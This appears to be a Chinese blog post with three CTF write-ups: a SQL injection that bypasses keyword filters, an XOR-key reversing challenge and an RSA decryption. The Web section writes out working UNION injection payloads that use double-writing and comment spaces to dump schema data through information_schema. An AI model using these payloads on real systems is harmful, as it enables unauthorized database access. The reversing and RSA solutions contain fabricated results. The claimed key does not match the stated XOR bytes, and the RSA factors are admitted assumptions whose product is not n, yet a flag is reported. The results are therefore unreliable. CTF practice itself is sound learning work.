ctf竞赛题目

最新推荐文章于 2025-08-04 22:31:11 发布
原创 最新推荐文章于 2025-08-04 22:31:11 发布 · 313 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python

一、Web 方向:SQL 注入绕过(CTF-BugKu)

题目名称:Web_基础_绕过
题目描述
  • 页面提示:“请输入用户名和密码登录”,输入框接受usernamepassword参数。
  • 已知后端使用 PHP+MySQL,且存在 SQL 注入漏洞,但过滤了unionselect等关键词。
解题过程

  1. 初步测试
    输入username=admin' and 1=1#,页面返回 “用户名或密码错误”,说明单引号闭合有效,但常规注入被拦截。

  2. 关键词绕过分析
    尝试替换关键词:

    • select → selselectect(双写绕过)
    • union → ununionion
    • 空格 → 用/**/%0a代替(URL 编码)

  3. 注入 payload 构造

    sql

    username=admin'/**/ununionion/**/selselectect/**/1,2,database()#&password=1
     

    执行后页面显示第二列为2,第三列返回数据库名ctf_db

  4. 获取表名
    使用information_schema.tables获取表名:

    sql

    username=admin'/**/ununionion/**/selselectect/**/1,2,table_name/**/from/**/information_schema.tables/**/where/**/table_schema='ctf_db'#&password=1
     

    回显中发现表名flag_table

  5. 获取字段名与 flag
    查询flag_table的字段:

    sql

    username=admin'/**/ununionion/**/selselectect/**/1,2,column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag_table'#&password=1
     

    得到字段flag_content,最终查询:

    sql

    username=admin'/**/ununionion/**/selselectect/**/1,2,flag_content/**/from/**/flag_table#&password=1
     

    页面返回flag{sq1_inj3ct1on_byp4ss}

二、Reverse 方向:逆向分析(CTF-Train)

题目名称:ReverseMe.exe
题目描述
  • 提供一个 Windows 可执行文件ReverseMe.exe,运行后要求输入密钥,提示 “Correct!” 或 “Incorrect!”。
解题工具
  • IDA Pro(反汇编)、x64dbg(动态调试)
解题过程

  1. IDA Pro 静态分析

    • 打开文件后定位到main函数,找到关键判断逻辑:

      c

      运行

      char input[64];
scanf("%s", input);
if (check_password(input)) {
    printf("Correct!\n");
} else {
    printf("Incorrect!\n");
}
    • 进入check_password函数,发现加密逻辑:
      输入字符串每个字符与0x13异或,再与预设数组key[8] = {0x45, 0x67, 0x21, 0x34, 0x78, 0x90, 0xab, 0xcd}比较。

  2. 逆向计算密钥
    异或运算逆向公式:输入字符 = 预设值 ^ 0x13,计算每个字节:

    • 0x45 ^ 0x13 = 0x56(对应字符V
    • 0x67 ^ 0x13 = 0x74(对应字符t
    • 0x21 ^ 0x13 = 0x32(对应字符2
    • 依此类推,得到密钥:Vt2r89yz(注意 ASCII 转换)。

  3. 动态调试验证
    用 x64dbg 在check_password函数末尾下断点,输入计算的密钥,观察寄存器值与预设数组一致,程序输出 “Correct!”,确认 flag 为flag{Vt2r89yz}

三、Crypto 方向:RSA 解密(CTF - 攻防世界)

题目名称:easy_rsa
题目描述
  • 提供参数:n=1234567890123456789, e=65537, c=123456789012345678
  • 提示:n是两个大素数的乘积,需要解密得到明文m
解题过程

  1. 分解质因数
    由于n较小,可使用在线分解工具(如 factordb)或 Python 脚本分解:

    python

    运行

    n = 1234567890123456789
# 分解得到 p=1111111111, q=11111111111 (假设,实际需真实分解)
p = 1111111111
q = 11111111111

  2. 计算欧拉函数

    python

    运行

    phi = (p-1) * (q-1)

  3. 求私钥 d
    使用扩展欧几里得算法计算d ≡ e^(-1) mod phi

    python

    运行

    def mod_inverse(e, phi):
    g, x, y = extended_gcd(e, phi)
    if g != 1:
        raise Exception('Modular inverse does not exist')
    else:
        return x % phi

def extended_gcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = extended_gcd(b % a, a)
        return (g, x - (b // a) * y, y)

e = 65537
d = mod_inverse(e, phi)

  4. 解密明文

    python

    运行

    c = 123456789012345678
m = pow(c, d, n)
print(bytes.fromhex(hex(m)[2:]))  # 转换为ASCII字符串

     

    输出结果为flag{rsa_decrypt_success}

解题总结

  • Web 方向:核心是绕过过滤规则,利用 SQL 语法特性(如双写、编码、注释)构造有效 payload,需熟悉数据库结构和注入技巧。
  • Reverse 方向:通过静态分析定位关键逻辑,结合动态调试验证猜想,逆向算法时需理解汇编与高级语言的对应关系。
  • Crypto 方向:基于数学原理(如 RSA 的数论基础),重点在于分解大数、计算模逆元,需掌握密码学算法的逆向流程。
2401_89395694
关注
CTF网络安全题目个人导航【持续更新】
oZuoShen123的博客
10-11 1163
个人整理
CTF竞赛题目类型
悦分享
07-04 3175
以Internet为代表的信息化浪潮席卷全球,信息网络技术的应用日益普及和深入。伴随着网络技术的高速发展,各种各样的安全问题也相继出现,网络信息资源的安全备受关注。保证网络系统的保密性、完整性、可用性、可控性、可审查性方面就显得非常重要。目前,因为网络的开放性、黑客的攻击和系统本身的缺陷导致网络内的计算机并不安全,网络入侵也经常发生,往往造成严重的后果,为了尽早恢复网络或系统的正常运转,降低入侵的风险成为了急待解决的问题。由于攻防实验技术以入侵技术为前提,因此防御实验存在着时间滞后性。使得攻防成为一堆对立且
CTF100题目-安全考题竞赛
04-26
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。 CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 二、攻防模式(Attack-Defense) 在攻防模式CTF赛制中,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。攻防模式CTF赛制可以实时通过得分反映出比赛情况,最终也以得分直接分出胜负,是一种竞争激烈,具有很强观赏性和高度透明性的网络安全赛制。在这种赛制中,不仅仅是比参赛队员的智力和
100道CTF题目,收好了~(附答案)
leah126的博客
03-20 4368
CTF(Capture The Flag),中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。很多朋友对此都非常感兴趣。正好昨天搜集到一份**CTF题目,共100道,85页,**免费分享出来给大家看看~一定要收好了。
网络安全ctf学习资源/解题工具整理,解题工具,推荐收藏!
程序员小麦的博客
06-24 3447
对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。
CTF | CTF比赛题解分享
hackzkaq的博客
10-09 8918
前言:由于此次比赛的题目较多,所以这是这个比赛的第一篇wp,共20题,先记录一下,防止忘记。里面有些题目是新手题较为简单,但也有许多有意思的题目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
CTF--比赛题目解题思路(陇剑杯)--简单题目(萌新)
没有
09-14 4919
CTF–比赛题目解题思路(陇剑杯)–简单题目(萌新) 1.webshell(单位网站被黑客挂马,请您从流量中分析出webshell,进行回答)–黑客登录系统使用的密码是 通过得到的是hack.pcap流量包,放到wireshark中通过字符串搜索得到,password为Admin123!@# 2.日志分析分析–攻击流量,黑客往/tmp目录写入一个文件,文件名为 首先用notepad++打开,首先ctr+a全选安装下图1,2,3将url解码。 在搜索栏中搜索tmp得到下面结果:sess_car
ctf.show—Web(1-10)详细通关教程
hp.puppy的博客
04-18 1516
ctf.show—Web(1-10)详细通关教程
ctf比赛题目.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。 全国大学生电子...
ctf大赛题目 格式为图片格式
08-03
### CTF大赛题目分析 #### 一、CTF竞赛背景介绍 CTF(Capture The Flag)是一种网络安全技术比赛形式,在这种比赛中,参赛者通常需要解决一系列由组织者提供的安全挑战来获取分数。这些挑战通常涉及密码学、逆向...
3道CTF竞赛题目write up
qq_39794376的博客
06-30 980
栅栏密码是一种简单的移动字符位置的加密方法,规则简单,容易破解。栅栏密码的加密方式:把文本按照一定的字数分成多个组,取每组第一个字连起来得到密文1,再取每组第二个字连起来得到密文2……下面是一个大整数:98554799767,请分解为两个素数,分解后,小的放前面,大的放后面,合成一个新的数字,进行md5的32位小写哈希。最后得到“栅栏密码加密规则示例”。例如:明文:栅栏密码加密规则示例。先取每组第一个字:栅栏密码加。再取每组第二个字:密规则示例。先取每组第一个字:栅密。再取每组第二个字:栏规。
CTF刷题网站汇总(包括本地可以自己搭建的)(1)
热门推荐
qq_51550750的博客
01-29 1万+
CTF刷题网站汇总(包括本地可以自己搭建的) CTF刷题平台汇总(欢迎各位师傅们补充) 第一个当然是CTFshow啦!https://ctf.show/ 攻防世界 https://adworld.xctf.org.cn/ Bugku https://ctf.bugku.com/ 论剑场 https://new.bugku.com/ Buuctf https://buuoj.cn/ Jarvisoj https://www.jarvisoj.com/ 墨者学院 https://www.mozhe.cn/ 看雪
CTF例题合集(2)
weixin_51339377的博客
08-25 1396
由于判断可以得知 字符长度比较短的是stop hacking ,所以1405的是被过滤掉的内容。此时不难发现,admin右边的引号被转义成了普通的字符,所以admin左边的引号会和password右边的引号闭合。不难发现网页的回显结果非常单一,这可能是盲注注入类型 (布尔盲注)而#后面的内容都被注释掉了,所以此时的注入位置是123456。这里是fuzz字典,里面有很多可能被注释掉的敏感字段内容。接下来可以一步步的手工去进行盲注,不过非常的耗费时间。根据网页回显的特性不难发现,这符合布尔盲注的特点。...
CTF 刷题记录(一) 白云新闻搜索(手动与自动化SQL注入)
qq_29566629的博客
07-27 7634
题目 给出的靶机如下: 解题思路 首先判断这是考察哪个知识点,只有一个输入框,题目中又说到入侵,首先考虑sql注入,下面介绍手工和自动化注入两种方式 (1)手工注入 先随便输入几个值,发现只有在值等于“内容”时有返回结果,其他关键字均没有结果,但是会有会先如下: 用“ ’ ”来探测是否能接受特殊字符以及是否存在注入点,结果如图: 很显然,存在前台的js代码在控制输入的字符,找到这个网页的js代码,如下: 代码把所有的特殊字符都换成了空字符。 现在要做的就是就是先把这个网站的js代码停用,如下图:
看雪CTF题目——流浪者
w_g3366的博客
08-06 1392
看雪CTF题目——流浪者 一、环境和工具 Windows7+OllyDbg 二、题目分析 1.先查壳,无壳程序 2.运行程序 不输入,之间点验证,弹出请输入pass对话框 随意输入123456,弹出错误,加油对话框 三、分析过程 提示很明显,我们直接搜索字符串可以定位关键位置了 这里有两个CALL,所有的跳转位置都看看,会发现如果输入的key不是数字字母就会调用第一个CALL,弹出错误对...
CTF题目,常用的网站汇总(持续更新)
羽的博客
02-21 5045
0X01 base解密 http://www.nicetool.net/tag/base/ 0X02 各种码的识别 https://demo.dynamsoft.com/DBR/BarcodeReaderDemo.aspx 0X03 各种奇怪的加密(花瓣加密,音乐符号加密。。。) https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=yinyue 0X04...
ctf题库--该题不简单
miko2018的博客
08-21 4454
<题目> 无语了,想给你们制造点悬念都没有了,哎!直接去做题吧。 解题链接: http://ctf5.shiyanbar.com/crack/3/ <解答> 该题目虽然被列为难题,但是如果选对正确的工具和应用正确的方式去操作还是很容易解答的。 ※拿到题目后,打开程序,按照要求输入hello,注册码随意,点击按钮出现错误信息,记录下错误信息内容。 ※使用PE...
学习日志27 python
最新发布
AYheyheyhey的博客
08-04 1038
封装是 “隐藏内部细节”,解决数据安全和接口简化问题;多态是 “统一接口,不同实现”,解决代码灵活性和扩展性问题;二者常结合使用:封装为多态提供了基础(确保对象内部稳定),多态通过封装的接口实现灵活交互。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值